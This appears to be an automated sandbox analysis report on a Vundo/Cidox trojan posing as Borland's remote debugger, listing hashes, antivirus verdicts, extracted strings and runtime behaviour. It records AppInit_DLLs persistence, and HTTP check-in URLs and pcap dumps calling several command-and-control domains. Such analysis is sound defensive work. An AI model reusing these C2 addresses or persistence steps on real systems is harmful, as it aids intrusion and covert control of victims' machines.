Analysis Date2014-07-04 07:30:41
MD51c90be658817d0b58bfacc4cecefb2c2
SHA1b6fe75ff5176750672c7b105e7662def49455f21

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f812075038dcea3fea928afb8fe5d286 sha1: 6ae144e4a6992d2252eaa92fb467f5ba34afd336 size: 90112
Section_ASM2 md5: a80f77ff2323f1a1f6e00e50e44288f7 sha1: 1eebe4b8cbda59abdf9ef3a9458678f53d3a1ba9 size: 62464
Section.rdata md5: 7557c2785132c407c82bdf0babb3180f sha1: 9720161578a93a15a4d12ecb5c81a559a55d22d6 size: 8192
Section.data md5: 1fb1c2845ee4fbd124ccb38a80ae6f42 sha1: 4acbaf6c98dab388417c5670a2ef793fc678104c size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-17 13:32:27
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhashca671bb93c526fd66343d82a84d1ea904cdf3dcf
IMPhash5b5fe4d280f8f7ea0aa9aa05e3974812
AV360 SafeGen:Variant.Spy.5
AVAd-AwareGen:Variant.Spy.5
AVAlwil (avast)Hioles-H [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen8
AVCA (E-Trust Ino)Win32/Vundo.ZAGA!suspicious
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17758
AVEmsisoftGen:Variant.Symmi.1446
AVEset (nod32)Win32/Citirevo.AD
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Variant.Spy.5
AVGrisoft (avg)Agent3.CCBM
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeVundo-FASV!1C90BE658817
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Vundo.J
AVMicroWorld (escan)Gen:Variant.Symmi.1446
AVNormanwinpe/Vundo.CRFL
AVRisingTrojan.Win32.Generic.1350CF3A
AVSophosMal/Vundo-M
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\jozhsii.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\jozhsii.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
208.73.211.242
DNSgetavodes.com
Type: A
208.73.211.163
DNSgetavodes.com
Type: A
208.73.211.174
DNSgetavodes.com
Type: A
208.73.211.175
DNSgetavodes.com
Type: A
208.73.211.193
DNStryatdns.com
Type: A
208.73.210.219
DNStryatdns.com
Type: A
208.73.211.174
DNStryatdns.com
Type: A
208.73.211.233
DNStryatdns.com
Type: A
208.73.211.235
DNStryatdns.com
Type: A
208.73.211.246
DNSfescheck.com
Type: A
208.73.210.205
DNSfescheck.com
Type: A
208.73.211.173
DNSfescheck.com
Type: A
208.73.211.246
DNSfescheck.com
Type: A
208.73.211.249
DNSfescheck.com
Type: A
208.73.210.203
DNSinstrango.com
Type: A
91.237.88.245
DNSnsknock.com
Type: A
208.73.211.246
DNSnsknock.com
Type: A
208.73.210.219
DNSnsknock.com
Type: A
208.73.211.174
DNSnsknock.com
Type: A
208.73.211.233
DNSnsknock.com
Type: A
208.73.211.235
DNStegimode.com
Type: A
208.73.211.249
DNStegimode.com
Type: A
208.73.210.203
DNStegimode.com
Type: A
208.73.210.205
DNStegimode.com
Type: A
208.73.211.173
DNStegimode.com
Type: A
208.73.211.246
DNSdenadb.com
Type: A
208.73.211.163
DNSdenadb.com
Type: A
208.73.211.174
DNSdenadb.com
Type: A
208.73.211.175
DNSdenadb.com
Type: A
208.73.211.193
DNSdenadb.com
Type: A
208.73.211.242
DNSforadns.com
Type: A
208.73.210.205
DNSforadns.com
Type: A
208.73.211.173
DNSforadns.com
Type: A
208.73.211.246
DNSforadns.com
Type: A
208.73.211.249
DNSforadns.com
Type: A
208.73.210.203
DNSnshouse1.com
Type: A
208.73.211.246
DNSnshouse1.com
Type: A
208.73.210.219
DNSnshouse1.com
Type: A
208.73.211.174
DNSnshouse1.com
Type: A
208.73.211.233
DNSnshouse1.com
Type: A
208.73.211.235
DNSgleospond.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF9ihf1Fd8UQh
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF69i4CVtlug5
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF4d7930D+uMl
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF5qfLN0ZP3fL
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF+gH+SPVnumD
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF5JtjZ94nFNp
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF52QGZo6iXkK
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF44kXlcYDWpI
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF2lLRLGWBCrQ
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF6fOFyofuteT
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.242:80
Flows TCP192.168.1.1:1032 ➝ 208.73.210.219:80
Flows TCP192.168.1.1:1033 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1034 ➝ 91.237.88.245:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.249:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.163:80
Flows TCP192.168.1.1:1038 ➝ 208.73.210.205:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463969 68663146 64385551 68204854   jF9ihf1Fd8UQh HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463639 69344356 746c7567 35204854   jF69i4CVtlug5 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463464 37393330 442b754d 6c204854   jF4d7930D+uMl HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463571 664c4e30 5a503366 4c204854   jF5qfLN0ZP3fL HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   73747261 6e676f2e 636f6d0d 0a0d0a     strango.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a462b67 482b5350 566e756d 44204854   jF+gH+SPVnumD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   6b6e6f63 6b2e636f 6d0d0a0d 0a0d0a     knock.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a46354a 746a5a39 346e464e 70204854   jF5JtjZ94nFNp HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207465   TP/1.1..Host: te
0x000000e0 (00224)   67696d6f 64652e63 6f6d0d0a 0d0a0a     gimode.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463532 51475a6f 3669586b 4b204854   jF52QGZo6iXkK HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a     nadb.com.......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463434 6b586c63 59445770 49204854   jF44kXlcYDWpI HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a     radns.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a46326c 4c524c47 57424372 51204854   jF2lLRLGWBCrQ HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   686f7573 65312e63 6f6d0d0a 0d0a0a     house1.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 39382661   XX0000&key=398&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37303726 6f733d35 2e312e32 3630302e   707&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673555 69626156 70566464 6a703150   yg5UibaVpVddjp1P
0x000000b0 (00176)   77434939 2f686841 3732382f 4d503030   wCI9/hhA728/MP00
0x000000c0 (00192)   6a463666 4f46796f 66757465 54204854   jF6fOFyofuteT HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323333 2e38392e 3130360d 0a0d0a     .233.89.106....


Strings
P
@
\.-l;juriVttcetorlauri
\
.CC
 
=...
.$..
040904E4
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
51.00
70.08.08.1442
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
BINARY
BORDBG61
bordbg61.exe
Borland Remote Debugging Server
Borland Software Corporation
 Borland Software Corporation 1990, 2001
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
Copyright 
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
iphapi32.dll
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
mscoree.dll
.`Mt
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0708dAa
0A@@Ju
0 Md+l
0pH'Pt
0SSSSS
|`0vEva
1q8QHF_YN1
^1]vq_
1Y[:2*V
}(3_D3
3~ on^
#|3$WS
4T,!h1
;5<s$?j
(6H.*K7
719("cP}
7Lq`|6
8G(C8RP
8G(R8_P
8G(V8OP
8RichNP
'~9]9ic}@
<9!g<+4
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADQl	.q)
ADVAPI32.dll
aLHLA|Z}
AlQm`]pM
An application has made an attempt to load the C runtime library incorrectly.
A|Q	a\qL
a\qla\qL
A\qLa\qL
A|Qla\qL
A|QLaVqv
|a{QwrH
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
AuQea[q
*aY6T]6
^!BB89
BeginPaint
@<b?\=o
*BQGf]
{(Bqou
BY INSTALLING AND USING THIS SOFTWARE, YOU ARE CONSENTING TO BE BOUND BY AND ARE BECOMING A PARTY TO THIS AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE "CANCEL" BUTTON AND THE INSTALLATION PROCESS WILL NOT CONTINUE. IF THESE TERMS ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO THESE TERMS. 
caH&T"z2
cksa;i	
CloseHandle
~CnL^cQ
CorExitProcess
CreateBitmap
Created and produced by Whole Tomato, Inc., 1733 Fessler St., Englewood, FL, USA, (408) 323-1590, info@wholetomato.com, www.wholetomato.com.
CreateWindowExA
- CRT not initialized
@.data
DDDDDDDD
dddd, MMMM dd, yyyy
D^d}q[
ddTDDd
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DestroyWindow
DeviceIoControl
d}f{=,
DgTztjOx
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DispatchMessageA
dj@brH6
dnWF=p
DOMAIN error
DPT/dd
 dP}Y!yPi
DrawTextA
e+|+^&
E!:;"`
E3j3x='
(#+EFr
EncodePointer
EndPaint
EnterCriticalSection
ExitProcess
